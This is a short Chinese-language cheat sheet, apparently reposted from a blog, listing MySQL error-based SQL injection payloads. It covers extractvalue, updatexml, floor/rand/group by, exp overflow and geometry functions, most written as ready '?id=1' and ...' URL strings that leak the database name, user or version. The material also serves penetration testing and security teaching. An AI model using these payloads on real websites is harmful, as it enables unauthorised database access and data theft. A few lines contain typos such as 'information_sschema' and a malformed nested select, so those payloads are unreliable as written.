标签：floor 0x7e 参数 concat MYSQL 报错 select 注入

　　函数extractvalue(参数1，参数2)

　　使用条件：mysql版本5.1以上 有长度限制32位

　　参数1：XML文档，参数2：XPAT语句

　　用法： extractvalue(1,concat(0x7e,(select user()),0x7e))

　　?id=1' and extractvalue(1,concat(0x7e,(select database()),0x7e)) -- -

 

　　

　　函数：updatexml(参数1，参数2，参数3)

　　参数1：xml文档对象名称，参数2：xpath格式字符串，参数3：string格式替换查找到的符合条件数据

　　使用条件：5.1.5及以上版本  有长度限制32位

　　?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- -

 

 

　　函数：floor()

　　利用floor、count、group by三者起冲突导致报错，使用 三者不可缺一

　　使用条件：mysql 5.0及以上版本

　　floor() 取整数

　　rand() 在[0,1]产生一个随机数

　　rand(0)*2  取0到2的随机数

　　and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_sschema.tables group by x) y)

　　?id=1' and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x) y)-- -

　　

　　其他注入

　　函数：exp()整形溢出报错注入

　　条件：mysql 5.5.5及以上版本

 

 

　　and exp(~(select * from (select user()) a))

　　几何报错注入

　　geometrycollection()、multipoint()、polygon()、multipolygon()、linestring()、multilinestring()

　　说明：函数对参数要求形如(12,33,221)这样几何数据，如果不满足要求，则报错

　　select multipoint((select * from (select * from (select from(select version())a)b)c))

　　

标签：floor,0x7e,参数,concat,MYSQL,报错,select,注入
来源： https://www.cnblogs.com/PatrickStar88888888/p/15212432.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。